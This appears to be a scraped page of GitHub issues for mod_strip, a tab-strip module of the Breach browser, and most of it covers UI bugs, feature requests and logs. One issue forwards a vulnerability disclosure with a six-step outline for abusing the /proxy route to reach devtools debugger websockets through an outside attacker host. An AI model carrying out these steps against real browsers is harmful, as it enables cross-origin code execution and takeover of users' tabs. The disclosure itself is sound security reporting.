breach / mod_strip Goto Github PK

If I close all tabs the focus is not on the search bar. I would suspect it to focus on it

While shrinking the browser the strip flickers and could potentially be dangerous if a user has epilepsy.
Tested on: OSX mavericks

The console window/area should be resizable by grabbing it along the top border to make it larger or smaller.

When navigating from a website to another, the favicon of the origin website may stick around until the new website's favicon arrives. This may be confusing and should be avoided.

Reported by Yann.
see https://groups.google.com/d/msg/breach-dev/4bKiDYspuDc/wZJXldO2hOkJ

Feature: new tab opens when clicked on empty area.
I have a basic POC working locally.

Please look at the screenshot below:

Explanation
Notice that above the Google logo, there's a Wikipedia logo. It is actually a new frame / viewport, created on top of the existing mod_strip/tabs region because I dragged an image there. I can still switch tabs with the ctrl + tab key.

Repro steps
Drag an image to the mod_strip region.

Expected behavior
A new tab is created, containing the image source URL.

When opening a tab, loading an URL (tabs_new), after the first navigation, the tabs may return to its original URL (tabs_load_url), which should not be possible.

Here's two example:

[2014-06-27T20:43:26.497Z] [tabs] tabs_show __NEW_TAB_ID__
[2014-06-27T20:43:28.678Z] [box] submit_url https://www.google.com/search?q=mdn%20split&ie=UTF-8
[2014-06-27T20:43:28.694Z] [tabs] tabs_new dfbac4e21913e85335f8de37c18db9705038652f [https://www.google.com/search?q=mdn%20split&ie=UTF-8]
[2014-06-27T20:43:28.694Z] [tabs] tabs_show dfbac4e21913e85335f8de37c18db9705038652f
[2014-06-27T20:43:31.259Z] [tabs] tabs_load_url dfbac4e21913e85335f8de37c18db9705038652f [https://www.google.com/search?q=mdn%20split&ie=UTF-8]
[2014-06-27T20:43:37.481Z] [tabs] tabs_show __NEW_TAB_ID__
[2014-06-27T20:44:22.783Z] [box] submit_url https://www.google.com/search?q=test&ie=UTF-8
[2014-06-27T20:44:22.800Z] [tabs] tabs_new 157471ee5c0b7058832dad57cddcd44825b32504 [https://www.google.com/search?q=test&ie=UTF-8]
[2014-06-27T20:44:22.801Z] [tabs] tabs_show 157471ee5c0b7058832dad57cddcd44825b32504
[2014-06-27T20:44:24.374Z] [tabs] tabs_show __NEW_TAB_ID__
[2014-06-27T20:44:56.985Z] [tabs] tabs_show 157471ee5c0b7058832dad57cddcd44825b32504
[2014-06-27T20:44:59.423Z] [tabs] tabs_load_url 157471ee5c0b7058832dad57cddcd44825b32504 [https://www.google.com/search?q=test&ie=UTF-8]

As the "X" only appears on mouse move!

Hi,

When I try to add mod_strip, I have the error

API rate limit exceeded for 92.xxx.xxx.xxx. (But here is the good news: Authenticated requests get a higher rate limit. Check out the documentation for more details.)

What could I do ?

Thanks in advance,

I may be missing the point with this, but I find scrolling the tab bar annoying. All other browsers auto-resize the tabs based on how many tabs are open and have a default size to start. I added in this functionality and it can be switched on by adding the 'resizable' class to the tabs div. I made a pull request for this as well.

Double clicking the back or forward button or focussing the strip and hitting Cmd+A selects some elements and it's a bit ugly. I don't expect browser UI elements to be selectable.

The fix is simple :

body {
    -webkit-user-select: none;
}

I'd like to be able to store bookmarks in breach.

Does this module exist? If not, should it be a new module or integrated with mod_strip?

Migration from spolu/breach_core#165.

status: accepted
assigned: t-lutz

There's a problem with the encoding of special characters when searching through the box. I think it could be an issue with the encoding taking place at socket.io that can be seen on the screenshot below. Look at byteString, the original input (ó) became another character.

Then at the Google search URL the (ó) becomes: (%F3) which in turn becomes a question mark sign (?) on the google results page.

When i try to close the tab other than the first one, the tab comes into active mode, but doesnt close.

Would someone need to develop a module to rearrange tabs?

There is a minor bug when typing a search in the URL bar, if the window loses focus the search term is wiped and set back to an empty box if on a blank page, or if on a page the page's URL.
The search term should persist until the user either cancels it by clicking elsewhere on the page or hitting escape. This is mainly down to intuitiveness, so perhaps it's not so much as a bug but a feature request.

Some pages may cause the tabs state to race vs gigfs
Example:
http://labs.five.com/marissamayer

When you scroll sideways in Safari or Chrome, the browser interprets it as a "back" or "forward" action. Having that behavior in breach would improve its usability.

I was wanting to do some work on mod_strip, which involved catching keypresses happening on the actual content frame, and then do an action with data from the content frame. However since it's in iframes this doesn't seem possible, does the core provide any access to other iframes or should these kinds of things be put in the core?
An example is CTRL+S saving the page, which i think is a functionality that all browsers must have.

I think Keyboard shortcuts are really useful:

• Cmd + Alt + (Left | Right) arrow ==> Change tabs
• Cmd + Shift + I ==> Inspect

And many more. Those are the 2 that I mostly use at least.

Thanks!

I've got file called keyboard_shortcuts.js under ~/.breach/modules/breach/mod_strip#v0.2.11-alpha.5/lib/keyboard_shortcuts.js but when i press for example CTRL+T nothing happens. Any idea how to fix it?

Most of the ui elements already use opacity to show and hide. Adding a transition (e.g. transition: opacity 0.2s), and changing colours (buttons, .loading) will improve the perception of the interface. Additionally "display" should in most cases not be used (.close) and be replaced with "opacity".

As reported by Adam Baldwin from andyet over email

Getting access to devtools

I'm curious to know what the /proxy route is actually used for on the
mod_strip extension? It allows for some interesting things. Specifically
one can use that route to load a page controlled by an attacker and
execute code.

Further then that code could attempt to locate the port the devtools are
running on and find the various endpoints for the open tabs at the /json
endpoint.

Normally this would be blocked by same origin policy but because of the
proxy route it's possible to get those endpoints. Having the content of
that json file means a debugger websocket connection can be made to each
of those tabs and code executed in the context of those tabs, which
gives xss on a variety of origins.

It would be pretty messy to exploit but here is how I would go about it.

1. Make requests to the following url to find the local port that allows
   proxy.
   127.0.0.1:PORT/proxy?url=http://evilpacket.net
2. Make requests to the following url to find the dev tools port that
   will give me the json endpoints. When it hits the right one it will
   notify the external service and we can correlate the 2 events.
   http://127.0.0.1:PORT/devtools/devtools.html?ws=evilpacket.net
3. Redirect user to the following url so that we can use same origin
   policy to get the json in the next step
   127.0.0.1:PORT_FROM_STEP_1/proxy?url=http://evilpacket.net/payload
4. Get the JSON via a request to
   127.0.0.1:PORT_FROM_STEP_1/proxy?> url=http://127.0.0.1:PORT_FROM_STEP_2/json
5. Parse json for ws url's
6. Make web socket connections to each of those and do whatever with the
   content on the tab's, etc acting as the devtools debugger over that ws
   channel.

Visiting https://chalmers.it (my student union site) which doesn't have a valid SSL-certificate crashes mod_strip entirely, here's the output:

[2014-07-10T20:54:58.539Z] ERROR: unable to verify the first certificate
[2014-07-10T20:54:58.540Z] Error: unable to verify the first certificate
[2014-07-10T20:54:58.540Z]     at Error (native)
[2014-07-10T20:54:58.540Z]     at TLSSocket.<anonymous> (_tls_wrap.js:906:36)
[2014-07-10T20:54:58.540Z]     at TLSSocket.EventEmitter.emit (events.js:104:17)
[2014-07-10T20:54:58.540Z]     at TLSSocket._finishInit (_tls_wrap.js:457:8)
[2014-07-10T20:54:58.540Z] ---------------------------------------------

Say I've got some tabs.

I type a search term to filter them…

Then I try to click on the first result, but instead the currently selected tab remains focused and I'm back where I started.

When no path in URL, a superfluous / is displayed

Additionally, URL bar bold font does feels weird according to some users

Hi,
There seems to be a bug with mod_strip on my client.
Mod_strip creates a blank bar at the top of breach. Empty but takes up the correct amount of space.
Running on OSX 10.9.3

When going to the last tab and backtracking up to the first tab, when reaching the first tab tab that is not fully visible, the tab incorrectly reposition.